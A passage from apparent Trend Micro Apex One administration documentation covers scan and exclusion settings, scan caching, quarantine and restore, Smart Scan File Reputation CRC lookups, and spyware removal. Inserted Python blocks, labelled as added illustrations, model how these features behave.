malware during Real-time Scan and Scheduled Scan, it can display a notification message to
inform the user about the detection. To modify the notification message, select Virus/Malware
from the Type drop-down in Administration > Notifications > Agent.

Display a Notification Message When Probable Virus/ Malware is Detected: When Apex One
detects probable virus/malware during Real-time Scan and Scheduled Scan, it can display a
notification message to inform the user about the detection. To modify the notification message,
select Virus/Malware from the Type drop-down in Administration > Notifications > Agent.

Back Up Files Before Cleaning: If Apex One is set to clean an infected file, it can first back up the
file. This allows you to restore the file in case you need it in the future. Apex One encrypts the
backup file to prevent it from being opened, and then stores the file in the identified folder.

Run cleanup when probable virus/malware is detected: You can only select this option if the
action on probable virus/malware is not Pass or Deny Access. For example, if the Security Agent
detects probable virus/malware during Real-time Scan and the action is quarantine, the Security
Agent first quarantines the infected file and then runs cleanup if necessary. The cleanup type
(standard or advanced) depends on your selection.

Spyware/Grayware Section

Clean: Apex One terminates processes or deletes registry entries, files, cookies, and shortcuts. After
cleaning spyware/grayware, Apex One agents back up spyware/grayware data, which you can
restore if you consider the spyware/grayware safe to access.

Deny access: Apex One denies access (copy, open) to the detected spyware/grayware
components.

Display a notification on endpoints when spyware/grayware is detected: When Apex One detects
spyware/grayware during Real-time Scan and Scheduled Scan, it can display a notification
message to inform the user about the detection.

Real-Time Scan Exclusion Tab

Configure scan exclusions to increase the scanning performance and skip scanning files causing
false alarms. When a particular scan type runs, Apex One checks the scan exclusion list to
determine which files on the endpoint will be excluded from both virus/malware and spyware/
grayware scanning.

Scan exclusions are stored in the Windows Registry on the endpoint computer.

Scan Exclusion Section

Enable scan exclusions: Enables the use of the Scan exclusions described on this tab.

Apply scan exclusion settings to all scan types: Enables the scan exclusions list to be used,
regardless of the scan type.

Scan Exclusion List (Directories): Apex One will not scan all files found under a specific directory
on the computer. You can specify a maximum of 256 directories. By excluding a directory from
scans, Apex One automatically excludes all of the directory’s sub-directories from scans.
• Exclude directories where Trend Micro products are installed: If you select this option,
Apex One automatically excludes the directories of many Trend Micro products from
scanning.

Scan Exclusion List (Files): Apex One will not scan a file if its file name matches any of the names
included in this exclusion list. If you want to exclude a file found under a specific location on the
endpoint, include the file path, such as C:\Temp\sample.jpg. You can specify a maximum of
256 files.

Scan Exclusion List (File Extensions): Apex One will not scan a file if its file extension matches
any of the extensions included in this exclusion list. You can specify a maximum of 256 file
extensions. A period (.) is not required before the extension.
• For Manual Scan, Scheduled Scan, and Scan Now, use a question mark (?) to replace a
single character or an asterisk (*) to replace multiple characters as wildcard characters.
For example, if you do not want to scan all files with extensions starting with D, such as
DOC, DOT, or DAT, type D* or D??.

Note: Real-time Scan does not support the use of wildcard characters when specifying extensions.
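As an added illustration (not Apex One's own code), the following Python models how the three exclusion lists above are applied to a path under the rules just described: an excluded directory covers its sub-directories, a file entry that carries a path matches only at that location, and extension wildcards are honoured by Manual Scan, Scheduled Scan and Scan Now but compared literally by Real-time Scan. Case-insensitive path comparison, the handling of an entry that exceeds the 256 limit and the sample paths are assumptions made here.

```python
import fnmatch
import ntpath

MAX_ENTRIES = 256                                                  # the guide's limit per list
ON_DEMAND_SCANS = {"Manual Scan", "Scheduled Scan", "Scan Now"}   # wildcard-capable scan types


class ScanExclusions:
    """Constructed model of the Directories / Files / File Extensions exclusion lists."""

    def __init__(self, directories=(), files=(), extensions=()):
        for entries in (directories, files, extensions):
            if len(entries) > MAX_ENTRIES:
                raise ValueError("an exclusion list holds at most %d entries" % MAX_ENTRIES)
        # Windows paths compare case-insensitively (assumption), so normalise everything once.
        self.directories = [ntpath.normcase(d).rstrip("\\") + "\\" for d in directories]
        self.files = [ntpath.normcase(f) for f in files]
        # A period is not required before the extension; drop one if it was typed.
        self.extensions = [ntpath.normcase(e).lstrip(".") for e in extensions]

    def is_excluded(self, path, scan_type):
        """True if `path` is skipped by `scan_type` under the configured exclusions."""
        p = ntpath.normcase(path)
        # Directory list: excluding a directory excludes all of its sub-directories too.
        if any(p.startswith(d) for d in self.directories):
            return True
        # File list: an entry with a path matches only that location, a bare name anywhere.
        name = ntpath.basename(p)
        for entry in self.files:
            if entry == (p if "\\" in entry else name):
                return True
        # Extension list: ? and * act as wildcards for on-demand scans only.
        ext = ntpath.splitext(p)[1].lstrip(".")
        for pattern in self.extensions:
            if scan_type in ON_DEMAND_SCANS:
                if fnmatch.fnmatchcase(ext, pattern):
                    return True
            elif ext == pattern:          # Real-time Scan: literal comparison, no wildcards
                return True
        return False
```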

Manual Scan Settings


Manual Scan is an on-demand scan and starts immediately after a user runs the scan on the Apex
One agent console. The time it takes to complete scanning depends on the number of files to scan
and the Apex One agent endpoint's hardware resources.

Manual Scan Target Tab

Scan Settings Section

Scan hidden folders: Allows Security Agents to detect and then scan hidden folders on the
endpoint during Manual Scan.

Scan boot area: Scans the boot sector of the hard disk for virus/malware during Manual Scan,
Scheduled Scan and Scan Now.

CPU Usage Section

Apex One can pause after scanning one file and before scanning the next file. This setting is used
during Manual Scan, Scheduled Scan, and Scan Now.
• High: No pausing between scans
• Medium: Pause between file scans if CPU consumption is higher than 50%, and do not
pause if 50% or lower
• Low: Pause between file scans if CPU consumption is higher than 20%, and do not pause
if 20% or lower

If you choose Medium or Low, when scanning is launched and CPU consumption is within
the threshold (50% or 20%), Apex One will not pause between scans, resulting in faster
scanning time. Apex One uses more CPU resource in the process but because CPU
consumption is optimal, endpoint performance is not drastically affected. When CPU
consumption begins to exceed the threshold, Apex One pauses to reduce CPU usage,
and stops pausing when consumption is within the threshold again. If you choose High,
Apex One does not check the actual CPU consumption and scans files without pausing.

Manual Scan Action Tab

Virus/Malware Section

Damage Cleanup Services: Damage Cleanup Services cleans computers of file-based and
network viruses, and virus and worm remnants (Trojans, registry entries, and viral files). The
Agent triggers Damage Cleanup Services before or after virus/malware scanning, depending on
the scan type.
• Standard cleanup: The Security Agent performs any of the following actions during
standard cleanup:
- Detects and removes live Trojans
- Kills processes that Trojans create
- Repairs system files that Trojans modify
- Deletes files and applications that Trojans drop
• Advanced cleanup: In addition to the standard cleanup actions, the Security Agent stops
activities by rogue security software (also known as FakeAV) and certain rootkit
variants. The Security Agent also uses advanced cleanup rules to proactively detect and
stop applications that exhibit FakeAV and rootkit behavior.

Manual Scan Exclusion Tab

Scheduled Scan Settings


Scheduled Scan runs automatically on the appointed date and time. Use Scheduled Scan to
automate routine scans on the agent and improve scan management efficiency.

Scheduled Scan Target Tab

Schedule Section

Configure how often (daily, weekly, or monthly) and what time Scheduled Scan will run. For
monthly Scheduled Scans, you can choose either a particular day of a month or a day of a week
and the order of its occurrence.

Scheduled Scan Action Tab

Scheduled Scan Exclusion Tab

Scan Now Settings


Scan Now is initiated remotely by administrators through the web console and can be targeted to
one or several Apex One agent endpoints.

Scan Now Target Tab

Scan Now Action Tab

Scan Now Scan Exclusion Tab

Trusted Program List


You can configure Security Agents to skip scanning of trusted processes during Real-time Scan, Behavior
Monitoring, Data Leak Prevention and Device Control scans (Scheduled, Manual and Scan Now scans
do not make use of the Trusted Program List). Add trusted programs to the Trusted Program List to
improve the performance of scanning on endpoints.

You can add program files to the Trusted Programs List if the following requirements are met:
• The program file is not located in the Windows system folder.
• The program file has a valid digital signature.

In the Apex One Web Management console, click Agents > Agent Management and right-click
specific domains or Agents. Click Settings > Trusted Program List and type the full program path of
the program to be excluded from scanning.

Scan Caching
The Security Agent can build a digital signature and on-demand scan cache files to improve its scan
performance. When an on-demand scan runs, the Security Agent first checks the digital signature
cache file and then the on-demand scan cache file for files to exclude from the scan. Scanning time is
reduced if a large number of files are excluded from the scan.

In the Apex One Web Management console, click Agents > Agent Management and right-click
the root domain, specific domains or Agents. Click Settings > Privileges and Other Settings.

Digital Signature Cache

Agents do not scan files whose signatures have been added to the digital signature cache file.

The Security Agent uses the same Digital Signature Pattern used for Behavior Monitoring to
build the digital signature cache file. The Digital Signature Pattern contains a list of files that
Trend Micro considers trustworthy and therefore can be excluded from scans.

Agents build the digital signature cache file according to a schedule, which is configurable from
the Web Management console. Agents do this to:
• Add the signatures of new files that were introduced to the system since the last cache
file was built.
• Remove the signatures of files that have been modified or deleted from the system.

During the cache building process, Agents check the following folders for trustworthy files and
then add the signatures of these files to the digital signature cache file:
• %PROGRAMFILES%
• %WINDIR%

Other folders are not checked for trustworthy files. The cache building process does not affect
the endpoint's performance because Agents use minimal system resources during the process.
Agents are also able to resume a cache building task that was interrupted for some reason (for
example, when the host machine is powered off or when a wireless endpoint's AC adapter is
unplugged).

On-demand Scan Cache

Security Agents do not scan files whose caches have been added to the on-demand scan cache
file.

Each time scanning runs, the Security Agent checks the properties of threat-free files. If a
threat-free file has not been modified for a certain period of time (the time period is
configurable), the Security Agent adds the cache of the file to the on-demand scan cache file.
When the next scan occurs, the file will not be scanned if its cache has not expired.

The cache for a threat-free file expires within a certain number of days (the time period is also
configurable). When scanning occurs on, or after the cache expiration, the Security Agent
removes the expired cache and scans the file for threats. If the file is threat-free and remains
unmodified, the cache of the file is added back to the on demand scan cache file. If the file is
threat-free but was recently modified, the cache is not added and the file will be scanned again
on the next scan.

The cache for a threat-free file expires to prevent the exclusion of infected files from scans, as
illustrated in the following examples:
• It is possible that a severely outdated pattern file may have treated an infected,
unmodified file as threat-free. If the cache does not expire, the infected file remains in
the system until it is modified and detected by Real-time Scan.
• If a cached file was modified and Real-time Scan is not functional during the file
modification, the cache needs to expire so that the modified file can be scanned for
threats.

The number of caches added to the on-demand scan cache file depends on the scan type and its
scan target. For example, the number of caches may be less if the Security Agent only scanned
200 of the 1,000 files in the endpoint during Manual Scan.

If on-demand scans are run frequently, the on-demand scan cache file reduces the scanning time
significantly. In a scan task where none of the caches have expired, scanning that usually takes 12
minutes can be reduced to 1 minute. Reducing the number of days a file must remain unmodified
and extending the cache expiration usually improve performance. Since files must remain
unmodified for a relatively short period of time, more caches can be added to the cache file. The
caches also take longer to expire, which means that more files are skipped from scans.

If on-demand scans are seldom run, you can disable the on-demand scan cache since caches
would have expired when the next scan runs.
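An added model (not Trend Micro's code) of the on-demand scan cache rules described above: a threat-free file is cached once it has stayed unmodified for the configured number of days, a cached file is skipped until its entry expires, and expiry is what eventually catches a modification that Real-time Scan was not running to see. Day-based timings, file names and the two configured periods are constructed sample values.

```python
from dataclasses import dataclass, field


@dataclass
class FileState:
    mtime: float        # last-modified time, in days (constructed sample units)
    infected: bool      # what scanning the file would find


@dataclass
class OnDemandScanCache:
    """Constructed model of the on-demand scan cache file; all times are in days."""
    unmodified_days: float   # a threat-free file must stay unmodified this long before it is cached
    expiry_days: float       # a cache entry stays valid this long
    entries: dict = field(default_factory=dict)   # path -> expiry time

    def on_write_seen_by_realtime_scan(self, path):
        """Real-time Scan notices a modification and drops the entry. While Real-time Scan
        is not functional nothing calls this, which is why entries must expire."""
        self.entries.pop(path, None)

    def scan(self, files, now):
        """One on-demand scan over `files` (path -> FileState) at time `now`.
        Returns the paths actually scanned; files with an unexpired cache entry are skipped."""
        scanned = []
        for path, state in files.items():
            expires_at = self.entries.get(path)
            if expires_at is not None and now < expires_at:
                continue                          # cache not expired: skip the file
            self.entries.pop(path, None)          # expired: remove the entry, then scan
            scanned.append(path)
            if not state.infected and now - state.mtime >= self.unmodified_days:
                self.entries[path] = now + self.expiry_days   # threat-free and stable: cache it
            # threat-free but recently modified: not cached, so it is scanned again next time
        return scanned


def demo():
    """Constructed timeline: cache after 3 unmodified days, entries valid for 14 days."""
    cache = OnDemandScanCache(unmodified_days=3, expiry_days=14)
    files = {"a.doc": FileState(mtime=0, infected=False),
             "b.exe": FileState(mtime=9, infected=False)}
    day10 = cache.scan(files, now=10)   # both scanned; only a.doc is old enough to be cached
    day11 = cache.scan(files, now=11)   # a.doc skipped, b.exe scanned (still too recent to cache)
    files["a.doc"].mtime = 12           # a.doc is modified while Real-time Scan is not running
    day13 = cache.scan(files, now=13)   # stale entry not yet expired: the modified a.doc is skipped
    day24 = cache.scan(files, now=24)   # entry expired: a.doc is scanned again
    return day10, day11, day13, day24
```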

Quarantining Detected Malware


The Quarantine action instructs Security Agents to physically send detected malware to the Apex One
Server, where it is stored in a centralized quarantine folder for future analysis.

When the Agent detects a malware instance that it is set to quarantine, it moves the file to its
...\Security Agent\SUSPECT folder. Afterwards, the Agent initiates the process of transferring the
malware to a folder called ...\VIRUS on the Apex One Server, where it is rendered inert for safe
storage.

Apex One administrators control how this folder is used by way of the Quarantine Manager. Click
Administration > Settings > Quarantine Manager.

Two aspects of the quarantine folder are configurable:
• Capacity of the quarantine folder
• The maximum size of the individual malware that the server will accept from a Security Agent

Files stored in the Quarantine folder are renamed according to the following naming convention:
<Security Agent hostname>_<server upload timestamp in Epoch/Unix time>.<sequence>

The sequence number differentiates files that were uploaded to the server within the same second. To
prevent infected files from being opened, Apex One encrypts the file before quarantining it or when
backing up a file before cleaning it.

Restoring Quarantined Files


Apex One provides mechanisms to decrypt and then restore the files in case you believe that a
detection was inaccurate.

Quarantined files on the Agent endpoint: These files are found in the ...\SUSPECT\Backup folder
and are automatically purged after 7 days. These files are also uploaded to the designated
Quarantine folder on the Apex One Server.

Quarantined files in the quarantine folder on the Server: By default, this folder is located on the
Apex One Server computer in the ...\PCCSRV\Virus folder.

Backed up encrypted files: These are the backups of infected files that Apex One was able to
clean. These files are found in the ...\Backup folder on the Agent endpoint. To restore these
files, users need to move them to the ...\SUSPECT\Backup folder on the Agent endpoint. Apex One
only backs up and encrypts files before cleaning if you select Backup files before cleaning in
Agents > Agent Management > Settings > Scan Settings > {Scan Type} > Action tab.

Note: Restoring an infected file may spread the virus/malware to other files and computers. Before
restoring the file, isolate the infected endpoint and move important files on this endpoint to a
backup location.

Central Quarantine Restore


The Central Quarantine Restore feature allows you to search for files in the quarantine directory and
perform SHA1 verification checking to ensure that the files you want to restore have not been
modified in any way.

If the file is on the Security Agent, the VSEncode tool can be used to restore files from quarantine.
1 In Windows Explorer, navigate to the following folder on the Security Agent computer:
...\Security Agent\
2 Double-click VSEncode.exe. A list of files found in the ...\SUSPECT\Backup folder is
displayed.
3 Click to select a file and click Restore.
4 Specify the folder where to restore the file and click OK. The file is restored to the specified
folder.

Note: The tool can only restore one file at a time.
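As an added example (not the product's own code), this Python models the quarantine file naming convention and the SHA1 check that Central Quarantine Restore performs: a per-second sequence number separates uploads from the same Agent that arrive within one second, and the SHA-1 recorded at upload is compared before a file may be restored. That the sequence starts at 0, the hostname, epoch and ciphertext values are all constructed assumptions, and the product's encryption is not reproduced.

```python
import hashlib
import re
from collections import defaultdict

# <Security Agent hostname>_<server upload timestamp in Epoch/Unix time>.<sequence>
NAME_RE = re.compile(r"^(?P<host>.+)_(?P<epoch>\d+)\.(?P<seq>\d+)$")


class QuarantineFolder:
    """Constructed model of the server-side quarantine folder: naming plus the SHA1 record
    that Central Quarantine Restore checks. The product's encryption is not reproduced."""

    def __init__(self):
        self._next_seq = defaultdict(int)   # (hostname, epoch second) -> next sequence number
        self.sha1_at_upload = {}            # stored name -> SHA-1 hex digest recorded on arrival

    def store(self, hostname, upload_epoch, encrypted_bytes):
        """Name an upload; the sequence (assumed to start at 0 here) separates files from the
        same Agent that reach the server within the same second."""
        key = (hostname, int(upload_epoch))
        name = f"{hostname}_{key[1]}.{self._next_seq[key]}"
        self._next_seq[key] += 1
        self.sha1_at_upload[name] = hashlib.sha1(encrypted_bytes).hexdigest()
        return name

    def ok_to_restore(self, name, encrypted_bytes):
        """The SHA1 verification step: restore only if the stored file is byte-for-byte what
        was uploaded. An unknown name or a changed digest both refuse the restore."""
        recorded = self.sha1_at_upload.get(name)
        return recorded is not None and hashlib.sha1(encrypted_bytes).hexdigest() == recorded


def parse_name(name):
    """Split a quarantine file name into (hostname, epoch, sequence), or None if malformed."""
    m = NAME_RE.match(name)
    return (m["host"], int(m["epoch"]), int(m["seq"])) if m else None
```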

Smart Scan
In addition to conventional pattern-based detection, Apex One offers Smart Scan, as a feature of the
Trend Micro Smart Protection Network.

Smart Scan shifts much of the malware and spyware scanning functionality to a Smart Protection
Server. It keeps local pattern files small and reduces the size and number of updates required by Agents.

The move to in-the-cloud protection is driven by two considerations:

• Malware creation is outstripping traditional malware knowledge deployment. By the time a
malware is recognized, it has already changed.
• As patterns grow in power, they grow in size. An inescapable consequence of a rise in the
number of malware is accelerated growth of anti-malware patterns. As things currently stand,
network administrators now have to be careful about when they schedule their updates, to avoid
network disruption.

To address these conditions, Trend Micro re-thought how it deployed malware knowledge to its
protection products. Instead of pre-deploying anti-malware knowledge to the end points, with
the resulting deployment delay and bandwidth issues, this knowledge is now deployed on-
demand from a centralized database that is updated more frequently than traditional methods
through a mechanism called File Reputation.

Smart Scan provides the following features and benefits:


• Reduces the overall time it takes to deliver protection against emerging threats
• Reduces network bandwidth consumed during pattern updates. The bulk of pattern definition
updates only needs to be delivered to the cloud and not to many endpoints
• Reduces the cost and overhead associated with corporate-wide pattern deployments
• Lowers kernel memory consumption on endpoints. Consumption increases minimally over time
• Provides fast, real-time security status lookup capabilities in the cloud and therefore increases
overall protection

By default this option is set to on. Agents that are implementing the Smart Protection Network solution
use the following components:
• Smart Scan Agent Pattern
The pattern file contains complete threat information for all malware that is currently in the
wild.
• Smart Query Filter
This compressed index file references complete threat information that is stored in the Smart
Scan Pattern on the Smart Protection Server.
• Smart Scan Pattern
This pattern file stores information for virus confirmation and actions to proceed in case of
cleaning and is located on the Smart Protection Server.

File Reputation
File Reputation is an implementation of malware identification through the use of Cyclic Redundancy
Check (CRC) values. Cyclic Redundancy Check information can be divided into two parts:
• Part 1 - Used for initial malware identification
• Part 2 - Used for malware confirmation

The following diagram represents a file that has been infected by a virus.

Diagram: Virus part 1 (Jump code) | File contents | Virus part 2 (Main portion). The jump code at the
front of the file points to the main portion.

When a virus infects a file, it typically appends a part of itself to the front of the file. This serves two
purposes:
• To keep other instances of the virus from re-infecting an already infected file, thereby
ensuring efficient propagation.
• To ensure that the virus code in the file runs first whenever the file is opened. This front-
appended portion often contains a jump command to the main portion of the virus, which is
located elsewhere in the file.

For this kind of virus, the CRC information in part 1 would be used to identify the first part of the
virus added to the front of the file.

Diagram: Virus part 1 (Jump code) | File contents | Virus part 2 (Main portion). CRC part 1 covers the
jump code at the front of the file.

The scan engine uses this information to detect if a file has been infected with a specific virus.

After detecting the first part of the virus using part 1 of the CRC information, the scan engine looks
for the corresponding part 2 of the CRC for additional identification information about the remaining
portion of the virus and to confirm that the file is indeed a virus.

To locate part 2 of the CRC information, the scan engine requires information about its expected
location within the file. This information is stored in what pattern builders call the CRC table, and the
location within the file is called its offset.

Diagram: Virus part 1 (Jump code) | File contents | Virus part 2 (Main portion). The offset measured
from the front of the file locates the main portion, which CRC part 2 covers.

Once the virus has been identified, the scan engine requires information to clean/remove the virus.
This information comes from the Smart Protection Server. Once the scan engine retrieves the
cleaning/removal information that corresponds to the identified virus, it is then able to take action
against the virus.

File Reputation addresses the needs enumerated in the previous section by de-constructing the
existing pattern.

Diagram: the existing pattern (CRC part 1, CRC part 2, virus info, non-CRC data) is split three ways.
The Smart Query Filter on the Security Agent is a new pattern generated from the CRC part 1 data. The
Smart Scan Pattern in the external database holds CRC part 1, CRC part 2 and virus info. The Smart
Scan Agent Pattern on the Security Agent holds the non-CRC pattern plus CRC and virus info for
in-the-wild malware.

Note the following changes to the existing pattern:


• CRC and virus information is still stored locally for malware that are classified as in-the-wild.
This means that the only malware information that is available locally corresponds to
malware that is actively doing harm. This information resides in the Smart Scan Agent
Pattern file.
• CRC and virus information for malware that are no longer considered in-the-wild is moved to
an external database called the Smart Scan Pattern. This pattern contains all the CRC Parts 1
and 2 information of the traditional pattern. Non-CRC data is also stored in the Smart Scan
Pattern.
• A compressed copy of CRC Part 1 information, for not-in-the-wild malware, is moved to a new
pattern called the Smart Query Filter, which the Security Agent uses to determine when to
query the external database for matching Part 2 information. This serves as a kind of index
to the information in the external database.

Note: Both the Smart Query Filter and Smart Scan Agent Pattern reside on the Security Agent.

External CRC Database


Components on the Security Agent are responsible for looking for malware and taking action upon
it when found. However, the knowledge required to identify malware does not completely reside
within the product itself; part of this knowledge is located externally.

The CRC database contains CRC information that corresponds to known malware. This database
resides on the Smart Protection Server. Security Agents can either refer to the global Trend Micro
Smart Protection Network, or a local Smart Protection Server if it is available.

These elements work together as shown below.

Diagram: the Security Agent and the Smart Protection Server exchange the ten numbered steps listed
below. On the Agent side: 1 reference the Smart Scan Agent Pattern for local verification, 2 calculate
CRC Part 1, 3 submit CRC Part 1, 6 malware identification, 7 Virus ID query, 10 remove malware. On
the server side: 4 Smart Scan Pattern query (for CRC Part 2), 5 return the corresponding CRC Part 2,
8 Smart Scan Pattern query (for virus info), 9 return cleaning/removal instructions from the virus info.

1 Reference Smart Scan Agent Pattern
Each time the Security Agent scans a file, it first uses the local pattern file to check if the
scanned content contains malware and obtain cleaning instructions. It does this by referencing
information in the Smart Scan Agent Pattern. The Agent uses this to perform the In-the-wild
verification and clean/remove these active viruses.
2 Calculate CRC Part 1
If the content looks suspicious but the malware cannot be detected and cleaned using the local
pattern files, it calculates a Cyclic Redundancy Check (CRC) sum for the initial portion of the
content (CRC Part 1).
3 Submit CRC Part 1
The Agent submits the CRC Part 1 sum to the local or in-the-cloud File Reputation Server on the
Smart Protection network to query the malware database for all records matching the
calculated CRC Part 1.
4 Smart Scan Pattern query for CRC Part 2
In this step, the Smart Protection Server uses the CRC Part 1 value to query for matching CRC
Part 2 information, which enables the scan engine to confirm that the suspect file is indeed
malware.
The CRC Part 2 information is stored in a database on the Smart Protection Server called the
Smart Scan Pattern.
By design, the Agent only waits for a response from the Smart Protection Server for a specific
period of time (a maximum of 500 milliseconds). For this brief period, the scan engine locks the
file. If the scan engine is unable to query the Smart Protection Server, the server-side processing
portion of this step does not occur, and the Agent attempts to query another Smart Protection
Server if one is available, or proceeds using offline protection.
5 Reply with Corresponding CRC Part 2
If the CRC information sent in the query matches CRC Part 1 information in the Smart Scan
Pattern, the Smart Protection Server returns all the corresponding CRC Part 2 records to the
Agent.

6 Malware identification
When the Agent receives the CRC Part 2 information from the Smart Protection Server, it passes
the information to the scan engine to perform matching operations. If no match is found, the file
is safe and the scanning process ends.
7 Virus ID query
If a match is found, the Agent sends a second query to the Smart Protection Server for
information about how to clean/remove the malware. Instead of sending CRC information like in
the first query, the Agent sends the Virus ID of the CRC Part 2 record of the malware that was
detected.
8 Smart Scan Pattern query
The Smart Protection Server then searches for the virus information that corresponds to this
Virus ID submitted to retrieve cleaning instructions.
9 Cleaning instructions returned to Agents
Once the virus information is retrieved, the Smart Protection Server returns this to the Agent
for use by the scan engine.
The Agent waits for a maximum of 500 milliseconds for the Smart Protection Server to reply. If
the Agent does not receive a timely reply, the Agent will abandon the primary action, in favor of
the secondary action. A failure in this operation would cause the Agent to quarantine the
malware instead of cleaning it.
10 Remove Malware
Finally, the Security Agent receives the virus information from the Smart Protection Server, and
the scan engine uses this information to clean/remove the virus.

Best Practice: Do not use Smart Scan if the computer doesn't have reliable network connectivity to
the Trend Micro Smart Protection Network or your Smart Protection Server.

CRC Caching
The CRC cache contains the following information:
• Malware confirmation CRC information
• Malware removal information (VINFO)

Apex One uses both types of information during the local verification step of the File Reputation
operation.

The ability of an offline Agent's scan engine to act upon suspected malware depends entirely on
which of these two types of information are present in the cache.


The following table describes what the Security Agent does in each of the following conditions:

CRC info   Virus info   Offline Behavior

x          x            No action is taken upon the file. The file is entered in the suspicious
                        file list for re-scanning, and is allowed to pass.

√          x            Since virus information is unavailable, the malware cannot be cleaned. If
                        the first action is set to clean, then the Security Agent will perform the
                        second action.

√          √            Security Agent cleans the virus based on information already in the cache.

Malware detected in offline conditions will be re-scanned once access to the Smart Protection Server
is restored.
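As an added illustration of the lookup sequence and offline behavior described above (this is not Trend Micro code), the following Python model puts the three pieces together: the Agent's memory-resident CRC cache, the 500 ms reply budget after which the Agent abandons the primary action in favor of the secondary action, and the decision table for an offline Agent. The record shapes (CRC to Virus ID, Virus ID to cleaning instructions), the constructed sample data, the simulated latency and the handling of a timed-out first (CRC) query are assumptions.

```python
"""Model of the Smart Scan lookup path: memory-resident CRC cache, 500 ms
server reply budget, and the offline decision table. Added illustration,
not Trend Micro code; record shapes and latency simulation are assumptions."""
from dataclasses import dataclass, field

QUERY_TIMEOUT_SEC = 0.5   # the Agent waits at most 500 ms for the server to reply
TIMEOUT = object()        # sentinel: no timely reply from the Smart Protection Server


@dataclass
class CrcCache:
    """Memory-resident cache: malware confirmation CRC info plus VINFO."""
    crc_info: dict = field(default_factory=dict)   # CRC -> Virus ID (None = no match, file is safe)
    vinfo: dict = field(default_factory=dict)      # Virus ID -> cleaning instructions


class SmartProtectionServer:
    """Constructed stand-in for the server; latency_sec simulates the network link."""

    def __init__(self, smart_scan_pattern, virus_info, latency_sec=0.0):
        self.pattern = smart_scan_pattern   # CRC -> Virus ID (CRC Part 2 records)
        self.virus_info = virus_info        # Virus ID -> cleaning instructions
        self.latency_sec = latency_sec

    def query_crc(self, crc):
        """First query: does this CRC match a CRC Part 2 record?"""
        return self.latency_sec, self.pattern.get(crc)

    def query_virus_id(self, virus_id):
        """Second query: cleaning instructions for a confirmed Virus ID."""
        return self.latency_sec, self.virus_info.get(virus_id)


class Agent:
    def __init__(self, server=None, primary="clean", secondary="quarantine"):
        self.server = server              # None models an Agent with no server connectivity
        self.cache = CrcCache()
        self.primary, self.secondary = primary, secondary
        self.suspicious_files = []        # re-scanned once the server is reachable again

    def _query(self, method_name, arg):
        """Apply the 500 ms budget to a simulated round trip; TIMEOUT if exceeded or offline."""
        if self.server is None:
            return TIMEOUT
        latency, result = getattr(self.server, method_name)(arg)
        return TIMEOUT if latency > QUERY_TIMEOUT_SEC else result

    def _fallback(self):
        """Table row 2: without cleaning info, a 'clean' action becomes the secondary action."""
        return self.secondary if self.primary == "clean" else self.primary

    def scan(self, crc):
        """Return the action taken for a file identified by its CRC."""
        if crc not in self.cache.crc_info:
            # Table row 1 when offline: list the file for re-scanning and let it pass.
            # Treating a timed-out CRC query the same way is an assumption.
            virus_id = self._query("query_crc", crc)
            if virus_id is TIMEOUT:
                self.suspicious_files.append(crc)
                return "allow"
            self.cache.crc_info[crc] = virus_id
        virus_id = self.cache.crc_info[crc]
        if virus_id is None:
            return "safe"                 # no match: scanning ends, nothing to act on
        if virus_id not in self.cache.vinfo:
            vinfo = self._query("query_virus_id", virus_id)
            if vinfo is TIMEOUT or vinfo is None:
                return self._fallback()   # offline or late reply: abandon the primary action
            self.cache.vinfo[virus_id] = vinfo
        return self.primary               # table row 3: act using cached cleaning info


# Constructed sample data: one known malware CRC and its cleaning record.
SMART_SCAN_PATTERN = {"crc-ransom-sample": "VID-100"}
VIRUS_INFO = {"VID-100": "terminate process; delete dropped files"}

if __name__ == "__main__":
    online = Agent(SmartProtectionServer(SMART_SCAN_PATTERN, VIRUS_INFO, latency_sec=0.05))
    print(online.scan("crc-ransom-sample"))   # clean (VINFO fetched and cached)
    online.server = None
    print(online.scan("crc-ransom-sample"))   # clean, served from the cache while offline
```

The point to take from the model is the second scan: once both the CRC record and the VINFO are cached, the Agent can still clean while offline, whereas an Agent that only holds the CRC record falls back to the secondary action.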

Cache.dat contains a snapshot of the contents of the memory-only CRC cache when the Security
Agent shuts down. It serves as a repository of the CRC and VINFO information already retrieved in
previous queries. When the Security Agent starts up, it reads this file to re-populate the cache.

The information in cache.dat is written in binary format, so it is not directly readable. The only
way to read the information stored in the CRC cache is with a command line tool called
DumpCache.exe. The tool's output (not reproduced here) includes a Count value; for example,
Count=22 indicates there were 22 entries in the cache.

CRC Cache Updates

The CRC information that a Security Agent retrieves from the Smart Protection Server is
stored in its memory-resident CRC cache. This allows the Agent to re-use information retrieved
in previous queries, thereby reducing bandwidth consumption.

If the Smart Scan Pattern on the Smart Protection Server is updated, the information in the
cache may become obsolete or incomplete. In that case, the information must either be updated
by way of CRC cache updates, or purged entirely and recreated.


Spyware/Grayware Protection
Spyware and grayware comprise applications and components that collect information to be
transmitted to a separate system or collected by another application. Although spyware/grayware
detections exhibit potentially malicious behavior, they may include applications used for legitimate
purposes such as remote monitoring.

Apex One uses the Spyware Scanning API (SSAPI) to deal with spyware. This scan engine uses a variety
of internal scanning functions to remove spyware-related files, as well as the changes these files make in
various system areas (for example, Windows registry, shortcuts, etc.).

Ntrtscan.exe is the Security Agent component that is responsible for scanning functionality. For this
purpose, it calls both VSAPI and SSAPI scan engines.

[Figure: spyware removal flow. Start → VSAPI detects malware → Is the malware spyware? →
Y: Use SSAPI to remove malware; N: Use VSAPI to remove malware → End]

VSAPI
VSAPI is responsible for real-time spyware detection. Since spyware always involves a file
component, these will still be detectable using conventional file scanning techniques.

Spyware removal, however, requires more than just removal of spyware-related files. Cookies, for
example, not only reside in the user's cookie folder but also in a special registry for cookies. To
effectively remove cookies, the latter must also be addressed. VSAPI lacks this ability to remove
spyware-related alterations in different system areas. This is why SSAPI is part of the process.

SSAPI
Once VSAPI detects the creation of a spyware file-component on the system, it passes this
information to Ntrtscan.exe, which then calls SSAPI to remove the spyware.

SSAPI can detect spyware based on either signatures or changes from a specific baseline. SSAPI
signatures are stored in a definition file.


Enabling SSAPI Logs

The spyware scanner's actions are recorded in SSAPI log entries. To generate these logs, the
following registry entry must be added:
HKLM\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc
DWORD: EnableSSAPILog = 1

The debug log is created in the location specified for the Security Agent debug log.

Digital Signatures

SSAPI checks the digital signatures of files that VSAPI recognizes as spyware. If the digital
signature of the file identified as spyware exists in the whitelist, the file is not removed. This
applies to all types of scanning (e.g., real-time, manual, etc.).

[Figure: digital signature check. Scan file with VSAPI → Call SSAPI to clean spyware → Check for
digital signature → Signature in whitelist? → Y: Do not remove spyware; N: Remove spyware]

Trend Micro maintains a list of known spyware/grayware that can be allowed by adding to your
